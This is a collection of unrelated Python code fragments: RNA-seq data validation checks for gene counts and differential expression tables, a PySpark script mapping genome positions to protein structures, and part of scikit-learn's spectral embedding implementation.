self.config["unstranded_assessment_range"]["min"],
self.config["unstranded_assessment_range"]["max"],
)
else: # this means that the standing is ambiguous
samples_outside_range = list()
codes.add(FlagCode.HALT1)
if len(samples_outside_range) != 0:
codes.add(FlagCode.RED2)
return Flag(
codes=codes,
check=self,
message_args={
"outliers": outliers,
"formatted_outliers": pformat(outliers, formatfloat),
"dominant_strandedness": (strand_assessment, assessment_value),
"samples_outside_range": samples_outside_range,
},
)
class DATASET_GENECOUNTS_0001(Check):
config = {
"metrics": [
"Unalignable",
"Alignable",
"Filtered",
"Total",
"alignable_percent",
"Unique",
"Multi",
"Uncertain",
],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
}
description = (
"Check that the gene counts alignments (source from the RSEM logs) have no outlier values among samples "
"for the following metrics: {metrics} "
"Yellow Flagged Outliers are defined as a being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
"deviations away from the {middle.name}. "
"Red Flagged Outliers are defined as a being {red_standard_deviation_threshold}+ standard "
"deviations away from the {middle.name}. "
)
flag_desc = {
FlagCode.GREEN: "No gene count mapping metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
codes = {FlagCode.GREEN}
# pull variables from config
metrics = self.config["metrics"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# extract dataframe of general stats
df = dataset.getMQCDataFrame(
sample_component="geneCounts", mqc_module="Rsem", mqc_plot="general_stats"
)
# iterate through metrics (here all pulled from FastQC general stats)
for metric_name in metrics:
sampleToMetricValue = df[[metric_name]].to_dict()[metric_name]
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetricValue = convert_nan_to_zero(sampleToMetricValue)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if max(codes) < FlagCode.YELLOW1:
codes.add(FlagCode.YELLOW1)
outliers[metric_name] = (
outliers[metric_name] | outliersForThisMetric
)
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if max(codes) < FlagCode.RED1:
codes.add(FlagCode.RED1)
outliers[metric_name] = (
outliers[metric_name] | outliersForThisMetric
)
return Flag(
codes=codes,
check=self,
message_args={
"outliers": outliers,
"formatted_outliers": pformat(outliers, formatfloat),
"metrics": metrics,
},
)
# TODO: Flag message gets really messy, convert into a json like string for easier reading/parsing
# TODO: Check for extra unexpected columns, these should give clues to names differences
class DATASET_DIFFERENTIALGENEEXPRESSION_0001(Check):
handle_with_monads = True
config = {
"expected_tables": [
"differential_expression.csv",
"visualization_output_table.csv",
"visualization_PCA_table.csv",
],
# Expected column name, but dependent on dataset organism
"dge_table_master_annotation_keys": {
"Arabidopsis thaliana": "TAIR",
"_DEFAULT": "ENSEMBL",
},
"dge_table_expected_annotation_columns": [
"SYMBOL",
"GENENAME",
"REFSEQ",
"ENTREZID",
"STRING_id",
"GOSLIM_IDS",
],
# includes column specific constraints
# these prefix as follows {prefix}{pairWiseFactorGroupComparison}
"pairwise_columns_prefixes": {
"Log2fc_": {"nonNull": True},
"Stat_": {"nonNull": True},
# can be removed from analysis before p-value and adj-p-value assessed
# ref: https://bioconductor.org/packages/release/bioc/vignettes/DESeq2/inst/doc/DESeq2.html#why-are-some-p-values-set-to-na
"P.value_": {"nonNegative": True, "nonNull": False},
"Adj.p.value_": {"nonNegative": True, "nonNull": False},
},
"viz_pairwise_columns_prefixes": {
"Log2_Adj.p.value_": {"nonNull": False},
"Sig.1_": {"allowedValues": [False, True], "nonNull": False},
"Sig.05_": {"allowedValues": [False, True], "nonNull": False},
"Log2_P.value_": {"nonNegative": False, "nonNull": False},
"Updown_": {"allowedValues": [1, 0, -1], "nonNull": True},
},
# these prefix as follows {prefix}{FactorGroup}
"group_factorwise_columns_prefixes": {
"Group.Mean_": {"nonNull": True, "nonNegative": True},
"Group.Stdev_": {"nonNull": True, "nonNegative": True},
},
"fixed_stats_columns": {
"All.mean": {"nonNull": True, "nonNegative": True},
"All.stdev": {"nonNull": True, "nonNegative": True},
"LRT.p.value": {"nonNull": False, "nonNegative": True},
},
"sample_counts_constraints": {"nonNegative": True},
"expected_vis_pca_columns": [
"PC1",
"PC2",
], # more may be included but these are REQUIRED
"float_tolerance": 0.0001, # PERCENT
# TODO: DISCUSS, these baseline values, should indicate a very heavy left-hand skewed histogram of differences - JDO
"log2fc_cross_method_percent_difference_threshold": 10, # PERCENT
"log2fc_cross_method_tolerance_percent": 50, # PERCENT
# PERCENT difference minimum between group means to included
"log2fc_cross_method_sign_check_group_mean_difference_threshold": 50,
# PERCENT genes allowed sign inversions between methods for groups that meet
# log2fc_cross_method_sign_check_group_mean_difference_threshold minimum
"log2fc_cross_method_sign_check_tolerance_percent": 0,
# "middle": MIDDLE.median,
# "yellow_standard_deviation_threshold": 2,
# "red_standard_deviation_threshold": 4,
}
description = (
"Check that the differential expression outputs exist (source from the deseq2 script) and "
"the following tables: {expected_tables}. "
"For studies with ERCC spike-in, performs the same check on analogous tables. "
"Additional performs the file specific validations: "
"- contrasts.csv: Includes all the existing comparison groups (based on factor values in the metadata) and is formatted correctly"
"- differential_expression.csv: Includes expected annotation columns {dge_table_expected_annotation_columns}, includes a master annotation key "
"column dependent on the dataset organism as follows: {dge_table_master_annotation_keys} ,"
"includes sample count columns for all samples, all sample count values are non-negative, "
"all pairwise comparision columns exist with the following prefixes and adhere to the following constraints: {pairwise_columns_prefixes} "
"all groupFactorWise statistics columns exists with the following prefixes and adhere to the following constraints: {group_factorwise_columns_prefixes} "
"all fixed statistics columns exist and adhere to the following constraints: {fixed_stats_columns} "
" - visualization_PCA_table.csv: All samples in index and at the following columns exist {expected_vis_pca_columns} "
" - visualization_output_table.csv: Performs same checks as differential_expression.csv as well as, "
"ensuring the additional pairwise comparision columns exist with the following prefixes and "
"adhere to the following constraints: {expected_vis_pca_columns}. "
"Confirms that gene counts between differential expression table and normalized counts tables are the same. "
"Confirms that computations match expectations with respect to following operations: (Float tolerance: +/-{float_tolerance} %)"
"- Group means are correctly computed from normalized counts "
"- log2FC values (computed with DESeq2's MLE approach) are comparable to direct computation with log2( mean(group1) / mean(group2) ), specifically "
"checking if at least {log2fc_cross_method_tolerance_percent} % of all genes have absolute percent differences between methods "
"less than {log2fc_cross_method_percent_difference_threshold} % "
)
flag_desc = {
FlagCode.GREEN: "All described elements checked and no issues arose",
FlagCode.HALT1: "Contrasts file does not match expectations based on metadata: Error Message(s): {contrasts_err_msg}",
FlagCode.HALT2: "Differential expression file does not match expectations: Error Message(s): {differential_expression_table_err_msg}",
FlagCode.HALT3: "Viz PCA file does not match expectations: Error Message(s): {viz_pca_err_msg}",
FlagCode.HALT4: "Viz output table file does not match expectations: Error Message(s): {viz_output_table_err_msg}",
}
def _contrasts_check(self, dataset: TemplateDataset, componentTarget: str) -> str:
"""Performs contrasts specific subcheck
Returns empty string if no issues are found
Returns an error message (string) otherwise
"""
# extract target Component
target_component = getattr(dataset, componentTarget)
err_msg = ""
# extract dicts for deseq2 contrasts and the metadata formatted one here
# make sure to read in explicit index column for deseq2
dict_deseq2: Dict = pd.read_csv(
target_component.contrastsCSV.path, index_col=0
).to_dict(orient="list")
dict_data_model: Dict = dataset.metadata.contrasts.to_dict(orient="list")
# check that all headers are present
deseq2_headers = set(dict_deseq2.keys())
data_model_headers = set(dict_data_model.keys())
if deseq2_headers != data_model_headers:
err_msg += f"Header disparity! Extra deseq2 headers: {deseq2_headers - data_model_headers} Extra metadata headers: {data_model_headers - deseq2_headers}"
# return early, if headers mismatch no point in checking column content
return err_msg
# check contents of each column matches expecatation (group1 and group2 formatted as expected)
# this also rechecks headers (keys) but that is caught in the prior validation
if dict_deseq2 != dict_data_model:
err_msg += f"Rows don't match expectations. Deseq2: {dict_deseq2}. DataModel (from metadata source): {dict_data_model}"
return err_msg
def _differential_expression_table_check(
self,
dataset: TemplateDataset,
componentTarget: str,
componentDataAsset: str = "annotatedTableCSV",
) -> str:
err_msg = ""
target_component = getattr(dataset, componentTarget)
target_data_asset = getattr(target_component, componentDataAsset)
# read in dataframe
df_dge = pd.read_csv(target_data_asset.path)
# check all constant columns exist
missing_constant_columns: set
master_key = self.config["dge_table_master_annotation_keys"].get(
dataset.metadata.organism,
self.config["dge_table_master_annotation_keys"]["_DEFAULT"],
)
log.debug(
f"Resolved master annotation key for {dataset.metadata.organism} is {master_key}"
)
expected_columns: list = self.config["dge_table_expected_annotation_columns"] + [master_key] # type: ignore
if missing_constant_columns := set(expected_columns) - set(df_dge.columns):
err_msg += f"Annotation Columns missing: {missing_constant_columns}"
# check all sample counts columns exist
expected_samples = set(dataset.samples.keys())
if missing_samples := expected_samples - set(df_dge.columns):
err_msg += f"Sample Count Columns missing: {missing_samples}"
# check that they met constraints
# all sample column counts are not negative
if not (df_dge[list(expected_samples)] >= 0).all(axis=None):
err_msg += (
f"Sample Count Columns include negative values: {missing_samples}"
)
# check all expected statistic columns present
# pairwise comparison level
pairwise_comparisons = dataset.metadata.contrasts.columns
for statistical_prefix, constraints in self.config[
"pairwise_columns_prefixes"
].items(): # type: ignore
target_cols: list = [
f"{statistical_prefix}{comparison}"
for comparison in pairwise_comparisons
]
# check existense first and bail if any don't exist
if missing_cols := set(target_cols) - set(df_dge.columns):
err_msg += f"Missing pairwise statistical column(s): {missing_cols}"
continue
target_df_subset: pd.DataFrame = df_dge[target_cols]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in columns {target_cols} fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in columns {target_cols} fails nonNegative constraint."
# factorGroup level
factorGroups = list(
set(dataset.metadata.factor_groups.values())
) # list-set to dedupe
for statistical_prefix, constraints in self.config[
"group_factorwise_columns_prefixes"
].items(): # type: ignore
target_cols = [f"{statistical_prefix}{group}" for group in factorGroups]
# check existense first and bail if any don't exist
if missing_cols := set(target_cols) - set(df_dge.columns):
err_msg += f"Missing groupFactor statistical column(s): {missing_cols}"
continue
target_df_subset = df_dge[target_cols]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in columns {target_cols} fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in columns {target_cols} fails nonNegative constraint."
# fixed stat columns level
for target_col, constraints in self.config["fixed_stats_columns"].items(): # type: ignore
# check existense first and bail if any don't exist
if missing_cols := {target_col} - set(df_dge.columns):
err_msg += f"Missing fixed statistical column(s): {missing_cols}"
continue
target_df_subset = df_dge[target_col]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in column ['{target_col}'] fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in column ['{target_col}'] fails nonNegative constraint."
# mathematical checks
groups: list[str] = list(
{group for group in dataset.metadata.factor_groups.values()}
)
# check means are computed correctly
for query_group in groups:
query_column = f"Group.Mean_{query_group}"
group_samples = [
sample
for sample, this_group in dataset.metadata.factor_groups.items()
if this_group == query_group
]
abs_percent_difference = abs(
(
(
(
df_dge[group_samples].mean(axis="columns")
- df_dge[query_column]
)
/ df_dge[query_column]
)
* 100
)
)
within_tolerance = abs_percent_difference < self.config["float_tolerance"]
if not within_tolerance.all() == True:
err_msg += f"Group Mean value in table is out of float tolerance. This means {query_group} has improperly computed values"
# check that log2FC are within a reasonable range
# the log2FC computation within DESEQ2 is NOT directly computed from the ratio of group means
#
for comparision in dataset.metadata.contrasts.columns:
query_column = f"Log2fc_{comparision}"
group1_mean_col = (
"Group.Mean_" + comparision.split(")v(")[0] + ")"
) # Uses parens and adds them back to prevent slicing on 'v' within factor names
group2_mean_col = "Group.Mean_" + "(" + comparision.split(")v(")[1]
computed_log2fc = (df_dge[group1_mean_col] / df_dge[group2_mean_col]).apply(
math.log, args=[2]
)
abs_percent_difference = abs(
((computed_log2fc - df_dge[query_column]) / df_dge[query_column]) * 100
)
percent_within_tolerance = (
mean(
abs_percent_difference
< self.config["log2fc_cross_method_percent_difference_threshold"]
)
* 100
)
# flag if not enough within tolerance
if (
percent_within_tolerance
< self.config["log2fc_cross_method_tolerance_percent"]
):
err_msg += (
f"For comparison: '{comparision}' {percent_within_tolerance:.2f} % of genes have absolute percent differences "
f"(between log2fc direct computation and DESeq2's approach) "
f"less than {self.config['log2fc_cross_method_percent_difference_threshold']} % which does not met the minimum percentage "
f"({self.config['log2fc_cross_method_tolerance_percent']} %) of genes required. "
f"This may indicate misassigned or misaligned columns. "
)
return err_msg
def _viz_pca_table_check(
self,
dataset: TemplateDataset,
componentTarget: str,
dataAssetTarget: str = "visualizationPCATableCSV",
) -> str:
err_msg = ""
target_component = getattr(dataset, componentTarget)
target_asset = getattr(target_component, dataAssetTarget)
# read into dataframe
df = pd.read_csv(target_asset.path, index_col=0)
# check all samples included
if missing_samples := set(dataset.samples.keys()) - set(df.index):
err_msg += f"Missing samples in index: {missing_samples}"
# check all expected columns exist
if missing_cols := set(self.config["expected_vis_pca_columns"]) - set(df.columns): # type: ignore
err_msg += f"Missing expected columns: {missing_cols}"
return err_msg
def _viz_output_table_check(
self, dataset: TemplateDataset, componentTarget: str
) -> str:
"""Since this effectively extends the differential expression table,
run that first and build on the error message as needed"""
err_msg = self._differential_expression_table_check(
dataset, componentTarget, componentDataAsset="visualizationTableCSV"
)
target_component = getattr(dataset, componentTarget)
target_data_asset = getattr(target_component, "visualizationTableCSV")
# read in dataframe
df = pd.read_csv(target_data_asset.path)
# check all expected columns exists (all unique to the viz table)
# check all expected statistic columns present
# pairwise comparison level
pairwise_comparisons = dataset.metadata.contrasts.columns
for statistical_prefix, constraints in self.config[
"viz_pairwise_columns_prefixes"
].items(): # type: ignore
target_cols: list = [
f"{statistical_prefix}{comparison}"
for comparison in pairwise_comparisons
]
# check existense first and bail if any don't exist
if missing_cols := set(target_cols) - set(df.columns):
err_msg += f"Missing pairwise statistical column(s): {missing_cols}"
continue
target_df_subset: pd.DataFrame = df[target_cols]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in columns {target_cols} fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in columns {target_cols} fails nonNegative constraint."
# check allowed values constraint
if (
constraints.get("allowedValues")
and onlyAllowedValues(
target_df_subset, constraints.get("allowedValues")
)
== False
):
err_msg += f"At least one value in columns {target_cols} fails allowedValues constraint (allowed values: {constraints.get('allowedValues')})."
return err_msg
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
codes = {FlagCode.GREEN}
target_components = ["differentialGeneExpression"]
if dataset.metadata.has_ercc:
target_components.append("differentialGeneExpressionERCC")
# holds component and subcheck specific error messages
err_msgs: Dict = defaultdict(dict)
for target_component in target_components:
#results = FlaggableMonad(dataset)
#results = results.bind(self._contrasts_check)
# perform contrasts file subcheck
contrasts_result = self._contrasts_check(dataset, target_component)
if contrasts_result != "":
codes.add(FlagCode.HALT1)
err_msgs["contrasts"][target_component] = contrasts_result
# perform differential expression file subcheck
differential_expression_result = self._differential_expression_table_check(
dataset, target_component
)
if differential_expression_result != "":
codes.add(FlagCode.HALT2)
err_msgs["differential_expression"][
target_component
] = differential_expression_result
# perform viz PCA file subcheck
viz_pca_result = self._viz_pca_table_check(dataset, target_component)
if viz_pca_result != "":
codes.add(FlagCode.HALT3)
err_msgs["viz_pca"][target_component] = viz_pca_result
# perform viz PCA file subcheck
viz_output_table_result = self._viz_output_table_check(
dataset, target_component
)
if viz_output_table_result != "":
codes.add(FlagCode.HALT4)
err_msgs["viz_output_table"][target_component] = viz_output_table_result
return Flag(
codes=codes,
check=self,
message_args={
"contrasts_err_msg": "::".join(
[f"{k}->{v}" for k, v in err_msgs["contrasts"].items()]
),
"differential_expression_table_err_msg": "::".join(
[
f"{k}->{v}"
for k, v in err_msgs["differential_expression"].items()
]
),
"viz_pca_table_err_msg": "::".join(
[f"{k}->{v}" for k, v in err_msgs["viz_pca"].items()]
),
"viz_output_table_err_msg": "::".join(
[f"{k}->{v}" for k, v in err_msgs["viz_output_table"].items()]
),
},
)
| StarcoderdataPython |
3230471 | #for chrom in ["chr1", "chr10", "chr11", "chr12", "chr13", "chr14", "chr15", "chr16", "chr17", "chr18", "chr19", "chr2", "chr20", "chr21", "chr22", "chr3", "chr4", "chr5", "chr6", "chr7", "chr8", "chr9", "chrX", "chrY"]:
#for chrom in ["chr19", "chr2", "chr20", "chr21", "chr22", "chr3", "chr4", "chr5", "chr6", "chr7", "chr8", "chr9", "chrX", "chrY"]:
localDir = "/home/ubuntu/pkerp"
for chrom in ["chrY"]:
dataframe = "/data/dataframes.rcsb.org/parquet/humangenome/20160517/hg38/" + chrom
uniprotpdbFile = '/data/dataframes.rcsb.org/parquet/uniprotpdb/20160517/'
chrMappingsFile = "/data/GCF_000001405.33.assembly.txt"
chrMappings = dict(sc.textFile(localDir + chrMappingsFile)
.filter(lambda x: x[0] != '#')
.map(lambda x: x.split('\t'))
.map(lambda x: dict(zip("Sequence-Name Sequence-Role Assigned-Molecule Assigned-Molecule-Location/Type GenBank-Accn Relationship RefSeq-Accn Assembly-Unit Sequence-Length UCSC-style-name".split(), x)))
.map(lambda x: (x['UCSC-style-name'],x['GenBank-Accn']))
.collect())
humangenome = (sqlContext.read.parquet(localDir + dataframe))
humangenome.registerTempTable("humangenome")
humangenome.count() #115,989,151
protpos_chrompos = humangenome.map(lambda x: ((x.uniProtId, int(x.uniProtPos)), (x.chromosomeName, x.orientation, x.position)))
uniprotpdb = (sqlContext.read.parquet(localDir + uniprotpdbFile))
uniprotpdb.registerTempTable("uniprotpdb")
uniprotpdb.count() #74,209,158
protpos_pdbinfo = uniprotpdb.map(lambda x: ((x.uniProtId, int(x.uniProtPos)), (x.pdbId, x.chainId, x.pdbAtomPos, x.insCode)))
joined = protpos_chrompos.join(protpos_pdbinfo)
joined_formatted = joined.map(lambda ((protid, protpos), ((chrid, orientation, pos), (pdbid, chainid, pdbAtomPos, insCode))): " ".join(map(str,[protid, protpos, chrid, orientation, pos, pdbid, chainid, pdbAtomPos, insCode])))
joined_formatted.saveAsTextFile("output/protpos_chrompos_pdbinfo_formatted_" + chrom)
| StarcoderdataPython |
3343925 | """Spectral Embedding."""
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import sparse
from scipy.linalg import eigh
from scipy.sparse.linalg import eigsh
from scipy.sparse.csgraph import connected_components
from scipy.sparse.csgraph import laplacian as csgraph_laplacian
from ..base import BaseEstimator
from ..utils import (
check_array,
check_random_state,
check_symmetric,
)
from ..utils._arpack import _init_arpack_v0
from ..utils.extmath import _deterministic_vector_sign_flip
from ..utils.fixes import lobpcg
from ..metrics.pairwise import rbf_kernel
from ..neighbors import kneighbors_graph, NearestNeighbors
from ..utils.validation import _deprecate_positional_args
from ..utils.deprecation import deprecated
def _graph_connected_component(graph, node_id):
"""Find the largest graph connected components that contains one
given node.
Parameters
----------
graph : array-like of shape (n_samples, n_samples)
Adjacency matrix of the graph, non-zero weight means an edge
between the nodes.
node_id : int
The index of the query node of the graph.
Returns
-------
connected_components_matrix : array-like of shape (n_samples,)
An array of bool value indicating the indexes of the nodes
belonging to the largest connected components of the given query
node.
"""
n_node = graph.shape[0]
if sparse.issparse(graph):
# speed up row-wise access to boolean connection mask
graph = graph.tocsr()
connected_nodes = np.zeros(n_node, dtype=bool)
nodes_to_explore = np.zeros(n_node, dtype=bool)
nodes_to_explore[node_id] = True
for _ in range(n_node):
last_num_component = connected_nodes.sum()
np.logical_or(connected_nodes, nodes_to_explore, out=connected_nodes)
if last_num_component >= connected_nodes.sum():
break
indices = np.where(nodes_to_explore)[0]
nodes_to_explore.fill(False)
for i in indices:
if sparse.issparse(graph):
neighbors = graph[i].toarray().ravel()
else:
neighbors = graph[i]
np.logical_or(nodes_to_explore, neighbors, out=nodes_to_explore)
return connected_nodes
def _graph_is_connected(graph):
""" Return whether the graph is connected (True) or Not (False).
Parameters
----------
graph : {array-like, sparse matrix} of shape (n_samples, n_samples)
Adjacency matrix of the graph, non-zero weight means an edge
between the nodes.
Returns
-------
is_connected : bool
True means the graph is fully connected and False means not.
"""
if sparse.isspmatrix(graph):
# sparse graph, find all the connected components
n_connected_components, _ = connected_components(graph)
return n_connected_components == 1
else:
# dense graph, find all connected components start from node 0
return _graph_connected_component(graph, 0).sum() == graph.shape[0]
def _set_diag(laplacian, value, norm_laplacian):
"""Set the diagonal of the laplacian matrix and convert it to a
sparse format well suited for eigenvalue decomposition.
Parameters
----------
laplacian : {ndarray, sparse matrix}
The graph laplacian.
value : float
The value of the diagonal.
norm_laplacian : bool
Whether the value of the diagonal should be changed or not.
Returns
-------
laplacian : {array, sparse matrix}
An array of matrix in a form that is well suited to fast
eigenvalue decomposition, depending on the band width of the
matrix.
"""
n_nodes = laplacian.shape[0]
# We need all entries in the diagonal to values
if not sparse.isspmatrix(laplacian):
if norm_laplacian:
laplacian.flat[::n_nodes + 1] = value
else:
laplacian = laplacian.tocoo()
if norm_laplacian:
diag_idx = (laplacian.row == laplacian.col)
laplacian.data[diag_idx] = value
# If the matrix has a small number of diagonals (as in the
# case of structured matrices coming from images), the
# dia format might be best suited for matvec products:
n_diags = np.unique(laplacian.row - laplacian.col).size
if n_diags <= 7:
# 3 or less outer diagonals on each side
laplacian = laplacian.todia()
else:
# csr has the fastest matvec and is thus best suited to
# arpack
laplacian = laplacian.tocsr()
return laplacian
@_deprecate_positional_args
def spectral_embedding(adjacency, *, n_components=8, eigen_solver=None,
random_state=None, eigen_tol=0.0,
norm_laplacian=True, drop_first=True):
"""Project the sample on the first eigenvectors of the graph Laplacian.
The adjacency matrix is used to compute a normalized graph Laplacian
whose spectrum (especially the eigenvectors associated to the
smallest eigenvalues) has an interpretation in terms of minimal
number of cuts necessary to split the graph into comparably sized
components.
This embedding can also 'work' even if the ``adjacency`` variable is
not strictly the adjacency matrix of a graph but more generally
an affinity or similarity matrix between samples (for instance the
heat kernel of a euclidean distance matrix or a k-NN matrix).
However care must taken to always make the affinity matrix symmetric
so that the eigenvector decomposition works as expected.
Note : Laplacian Eigenmaps is the actual algorithm implemented here.
Read more in the :ref:`User Guide <spectral_embedding>`.
Parameters
----------
adjacency : {array-like, sparse graph} of shape (n_samples, n_samples)
The adjacency matrix of the graph to embed.
n_components : int, default=8
The dimension of the projection subspace.
eigen_solver : {'arpack', 'lobpcg', 'amg'}, default=None
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities. If None, then ``'arpack'`` is
used.
random_state : int, RandomState instance or None, default=None
Determines the random number generator used for the initialization of
the lobpcg eigenvectors decomposition when ``solver`` == 'amg'. Pass
an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
eigen_tol : float, default=0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
norm_laplacian : bool, default=True
If True, then compute normalized Laplacian.
drop_first : bool, default=True
Whether to drop the first eigenvector. For spectral embedding, this
should be True as the first eigenvector should be constant vector for
connected graph, but for spectral clustering, this should be kept as
False to retain the first eigenvector.
Returns
-------
embedding : ndarray of shape (n_samples, n_components)
The reduced samples.
Notes
-----
Spectral Embedding (Laplacian Eigenmaps) is most useful when the graph
has one connected component. If there graph has many components, the first
few eigenvectors will simply uncover the connected components of the graph.
References
----------
* https://en.wikipedia.org/wiki/LOBPCG
* Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method
<NAME>
https://doi.org/10.1137%2FS1064827500366124
"""
adjacency = check_symmetric(adjacency)
try:
from pyamg import smoothed_aggregation_solver
except ImportError as e:
if eigen_solver == "amg":
raise ValueError("The eigen_solver was set to 'amg', but pyamg is "
"not available.") from e
if eigen_solver is None:
eigen_solver = 'arpack'
elif eigen_solver not in ('arpack', 'lobpcg', 'amg'):
raise ValueError("Unknown value for eigen_solver: '%s'."
"Should be 'amg', 'arpack', or 'lobpcg'"
% eigen_solver)
random_state = check_random_state(random_state)
n_nodes = adjacency.shape[0]
# Whether to drop the first eigenvector
if drop_first:
n_components = n_components + 1
if not _graph_is_connected(adjacency):
warnings.warn("Graph is not fully connected, spectral embedding"
" may not work as expected.")
laplacian, dd = csgraph_laplacian(adjacency, normed=norm_laplacian,
return_diag=True)
if (eigen_solver == 'arpack' or eigen_solver != 'lobpcg' and
(not sparse.isspmatrix(laplacian) or n_nodes < 5 * n_components)):
# lobpcg used with eigen_solver='amg' has bugs for low number of nodes
# for details see the source code in scipy:
# https://github.com/scipy/scipy/blob/v0.11.0/scipy/sparse/linalg/eigen
# /lobpcg/lobpcg.py#L237
# or matlab:
# https://www.mathworks.com/matlabcentral/fileexchange/48-lobpcg-m
laplacian = _set_diag(laplacian, 1, norm_laplacian)
# Here we'll use shift-invert mode for fast eigenvalues
# (see https://docs.scipy.org/doc/scipy/reference/tutorial/arpack.html
# for a short explanation of what this means)
# Because the normalized Laplacian has eigenvalues between 0 and 2,
# I - L has eigenvalues between -1 and 1. ARPACK is most efficient
# when finding eigenvalues of largest magnitude (keyword which='LM')
# and when these eigenvalues are very large compared to the rest.
# For very large, very sparse graphs, I - L can have many, many
# eigenvalues very near 1.0. This leads to slow convergence. So
# instead, we'll use ARPACK's shift-invert mode, asking for the
# eigenvalues near 1.0. This effectively spreads-out the spectrum
# near 1.0 and leads to much faster convergence: potentially an
# orders-of-magnitude speedup over simply using keyword which='LA'
# in standard mode.
try:
# We are computing the opposite of the laplacian inplace so as
# to spare a memory allocation of a possibly very large array
laplacian *= -1
v0 = _init_arpack_v0(laplacian.shape[0], random_state)
_, diffusion_map = eigsh(
laplacian, k=n_components, sigma=1.0, which='LM',
tol=eigen_tol, v0=v0)
embedding = diffusion_map.T[n_components::-1]
if norm_laplacian:
embedding = embedding / dd
except RuntimeError:
# When submatrices are exactly singular, an LU decomposition
# in arpack fails. We fallback to lobpcg
eigen_solver = "lobpcg"
# Revert the laplacian to its opposite to have lobpcg work
laplacian *= -1
elif eigen_solver == 'amg':
# Use AMG to get a preconditioner and speed up the eigenvalue
# problem.
if not sparse.issparse(laplacian):
warnings.warn("AMG works better for sparse matrices")
# lobpcg needs double precision floats
laplacian = check_array(laplacian, dtype=np.float64,
accept_sparse=True)
laplacian = _set_diag(laplacian, 1, norm_laplacian)
# The Laplacian matrix is always singular, having at least one zero
# eigenvalue, corresponding to the trivial eigenvector, which is a
# constant. Using a singular matrix for preconditioning may result in
# random failures in LOBPCG and is not supported by the existing
# theory:
# see https://doi.org/10.1007/s10208-015-9297-1
# Shift the Laplacian so its diagononal is not all ones. The shift
# does change the eigenpairs however, so we'll feed the shifted
# matrix to the solver and afterward set it back to the original.
diag_shift = 1e-5 * sparse.eye(laplacian.shape[0])
laplacian += diag_shift
ml = smoothed_aggregation_solver(check_array(laplacian,
accept_sparse='csr'))
laplacian -= diag_shift
M = ml.aspreconditioner()
X = random_state.rand(laplacian.shape[0], n_components + 1)
X[:, 0] = dd.ravel()
_, diffusion_map = lobpcg(laplacian, X, M=M, tol=1.e-5,
largest=False)
embedding = diffusion_map.T
if norm_laplacian:
embedding = embedding / dd
if embedding.shape[0] == 1:
raise ValueError
if eigen_solver == "lobpcg":
# lobpcg needs double precision floats
laplacian = check_array(laplacian, dtype=np.float64,
accept_sparse=True)
if n_nodes < 5 * n_components + 1:
# see note above under arpack why lobpcg has problems with small
# number of nodes
# lobpcg will fallback to eigh, so we short circuit it
if sparse.isspmatrix(laplacian):
laplacian = laplacian.toarray()
_, diffusion_map = eigh(laplacian, check_finite=False)
embedding = diffusion_map.T[:n_components]
if norm_laplacian:
embedding = embedding / dd
else:
laplacian = _set_diag(laplacian, 1, norm_laplacian)
# We increase the number of eigenvectors requested, as lobpcg
# doesn't behave well in low dimension
X = random_state.rand(laplacian.shape[0], n_components + 1)
X[:, 0] = dd.ravel()
_, diffusion_map = lobpcg(laplacian, X, tol=1e-15,
largest=False, maxiter=2000)
embedding = diffusion_map.T[:n_components]
if norm_laplacian:
embedding = embedding / dd
if embedding.shape[0] == 1:
raise ValueError
embedding = _deterministic_vector_sign_flip(embedding)
if drop_first:
return embedding[1:n_components].T
else:
return embedding[:n_components].T
class SpectralEmbedding(BaseEstimator):
"""Spectral embedding for non-linear dimensionality reduction.
Forms an affinity matrix given by the specified function and
applies spectral decomposition to the corresponding graph laplacian.
The resulting transformation is given by the value of the
eigenvectors for each data point.
Note : Laplacian Eigenmaps is the actual algorithm implemented here.
Read more in the :ref:`User Guide <spectral_embedding>`.
Parameters
----------
n_components : int, default=2
The dimension of the projected subspace.
affinity : {'nearest_neighbors', 'rbf', 'precomputed', \
'precomputed_nearest_neighbors'} or callable, \
default='nearest_neighbors'
How to construct the affinity matrix.
- 'nearest_neighbors' : construct the affinity matrix by computing a
graph of nearest neighbors.
- 'rbf' : construct the affinity matrix by computing a radial basis
function (RBF) kernel.
- 'precomputed' : interpret ``X`` as a precomputed affinity matrix.
